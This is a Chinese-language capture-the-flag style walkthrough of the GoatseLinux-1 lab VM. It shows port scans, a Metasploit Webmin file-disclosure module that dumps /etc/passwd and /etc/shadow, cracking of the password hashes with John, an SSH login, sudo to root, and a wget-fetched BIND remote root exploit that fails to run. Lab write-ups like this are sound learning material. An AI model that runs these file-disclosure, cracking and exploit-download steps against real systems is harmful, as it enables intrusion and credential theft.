vulnhub靶机渗透[GoatseLinux-1]

名称：GoatseLinux：1
发布日期：2009年6月27日

下载：

• Download: http://neutronstar.org/tmp/GoatseLinux_1.0_VM.rar
• Download (Mirror): https://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rar
• Download (Torrent): https://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rar.torrent

描述：

GoatseLinux v1.0 Pentest实验室虚拟机
史蒂夫·波顿
2009.06.27
在gnu许可下广泛分发。
这是专门为VMware 6.5兼容性而构建的。
警告：GoatseLinux是不安全的。 它被设计为用于进行渗透测试的实验室工具箱。 由于几乎所有安装的程序都具有广泛的开放性，因此强烈建议您不要将VM网络设置为除“基于主机”之外的任何方式，除非您喜欢将VM用作僵尸垃圾邮件箱。
笔记：
建立在Slax 5.0.7版本上。
资料来源：readme.txt

信息收集

nmap伺候

root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.132
Host is up (0.00015s latency).
MAC Address: 00:0C:29:0A:54:68 (VMware)

root@kali:~# nmap -sV -Pn -p- -v 192.168.142.132
PORT      STATE SERVICE VERSION
21/tcp    open  ftp
22/tcp    open  ssh     OpenSSH 3.5p1 (protocol 1.99)
25/tcp    open  smtp    Sendmail
53/tcp    open  domain  ISC BIND 8.2.2-REL
80/tcp    open  http    Apache httpd 1.3.31 ((Unix))
587/tcp   open  smtp    Sendmail
631/tcp   open  ipp     CUPS 1.1
3306/tcp  open  mysql   MySQL (unauthorized)
10000/tcp open  http    MiniServ 0.01 (Webmin httpd)

发现:

http://192.168.142.132/

http://192.168.142.132/goatse.html

http://192.168.142.132:10000/

是基于Web的系统管理工具Webmin。Metasploit提供了三种漏洞利用:一个用于shell，两个用于获取任意文件的辅助模块。

msf伺候

root@kali:~# msfdb run
[+] Starting database
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----                                                   
                            /  ,' `-._<.===-'                                                          
                           /  /                                                                        
                          /  ;                                                                         
              _          /   ;                                                                         
 (`._    _.-"" ""--..__,'    |                                                                         
 <_  `-""                     \                                                                        
  <`-                          :                                                                       
   (__   <__.                  ;                                                                       
     `-.   '-.__.      _.'    /                                                                        
        \      `-.__,-'    _,'                                                                         
         `._    ,    /__,-'                                                                            
            ""._\__,'< <____                                                                           
                 | |  `----.`.                                                                         
                 | |        \ `.                                                                       
                 ; |___      \-``                                                                      
                 \   --<                                                                               
                  `.`.<                                                                                
                    `-'                                                                                
                                                                                                       
                                                                                                       

       =[ metasploit v5.0.64-dev                          ]
+ -- --=[ 1952 exploits - 1092 auxiliary - 335 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/admin/webmin/file_disclosure
msf5 auxiliary(admin/webmin/file_disclosure) > set RHOST 192.168.142.132
RHOST => 192.168.142.132
msf5 auxiliary(admin/webmin/file_disclosure) > exploit
[*] Running module against 192.168.142.132

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/var/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
guest:x:1000:100::/home/guest:/bin/bash
goatse:x:1002:10:,,,:/home/goatse:/bin/bash
jpelman:x:1003:100:,,,:/home/jpelman:/bin/bash
jblow:x:1004:100:,,,:/home/jblow:/bin/bash
[*] Auxiliary module execution completed
msf5 auxiliary(admin/webmin/file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf5 auxiliary(admin/webmin/file_disclosure) > exploit
[*] Running module against 192.168.142.132

[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$k6V/lmUF$n2iBfemYg/IsVRyjqopr3.:14422:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
guest:$1$T7.0qXyH$hC4dje14rIUFJXbZUCkdB/:12876:0:99999:7:::
goatse:$1$lXWz2SF8$sr5ux2i3UpMAf30t5uMtT0:14422:0:99999:7:::
jpelman:$1$3nO0QVVF$Iy21QTWTrHPd5/6ZrAvrj.:14422:0:99999:7:::
jblow:$1$35A0vqVF$MoYgZm/DxNS5nBZZk3Y2R1:14422:0:99999:7:::
[*] Auxiliary module execution completed

将/etc/shadow保存为.txt文件然后使用john破解密码的hash,左边是密码，右边是用户名。

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt /root/goastshadow
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bobby            (jpelman)
kokomo           (jblow)
guest            (guest)
gaping           (goatse)
4g 0:00:00:49 DONE (2019-12-18 21:35) 0.08014g/s 282509p/s 320894c/s 320894C/s !!!0mc3t..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

使用其中一个用户goatse登录

root@kali:~# ssh goatse@192.168.142.132
The authenticity of host '192.168.142.132 (192.168.142.132)' can't be established.
RSA key fingerprint is SHA256:25uPigwKnzugpFkHd91FCdBukcikll8dkH4oV7OQROY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.132' (RSA) to the list of known hosts.
goatse@192.168.142.132's password: 
Linux 2.6.15.
goatse@slax:~$ id
uid=1002(goatse) gid=10(wheel) groups=10(wheel)
goatse@slax:~$ whoami
goatse
goatse@slax:~$ pwd
/home/goatse
goatse@slax:~$

提权1

goatse@slax:~$ uname -a
Linux slax 2.6.15 #1 SMP Tue Jan 10 07:53:57 GMT 2006 i686 unknown unknown GNU/Linux
goatse@slax:~$ sudo -s
Password:
root@slax:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
root@slax:~# whoami
root

提权2

另一个方法通过使用旧内核,prctl权限提升漏洞。
exp下载，BIND

kali端

root@kali:~# python -m SimpleHTTPServer

shell端

goatse@slax:~$ wget http://192.168.142.128:8000/282.c
--20:16:25--  http://192.168.142.128:8000/282.c
           => `282.c'
Connecting to 192.168.142.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,429 (16K) [text/plain]

100%[===========================================================>] 16,429        --.--K/s             

20:16:25 (290.15 MB/s) - `282.c' saved [16429/16429]

编译并运行

goatse@slax:~$ gcc 282.c -o bind
282.c:565:28: warning: no newline at end of file
goatse@slax:~$ ls
282.c*  bind*  test.sh*
oatse@slax:~$ ./bind 127.0.0.1
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net

[*] attacking 127.0.0.1 (127.0.0.1)
[d] HEADER is 12 long
[d] infoleak_qry was 476 long
[*] iquery resp len = 719
[d] argevdisp1 = 080d7cd0, argevdisp2 = b7daea64
[*] retrieved stack offset = bfc2a8f8
[d] evil_query(buff, bfc2a8f8)
[d] shellcode is 134 long
[d] olb = 248
[x] could not write our data in buffer (offset0=56, rroffsetidx=4)
[x] error sending tsig packet

不知为什么一直运行失败，此SSH上还有一个root漏洞利用。 还有Apache的权限提升。 以及CUPS中的多个远程Shell漏洞。 这是一个旧漏洞的游乐场。 Metasploitable具有更多易受攻击的服务（以及Metasploitable 2），如果您正在寻找这样的游乐场，建议选择Goatsie上的那些。

Game over

不好意思，这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本，i am so sorry about this…It’s a pity…

The end,to be continue…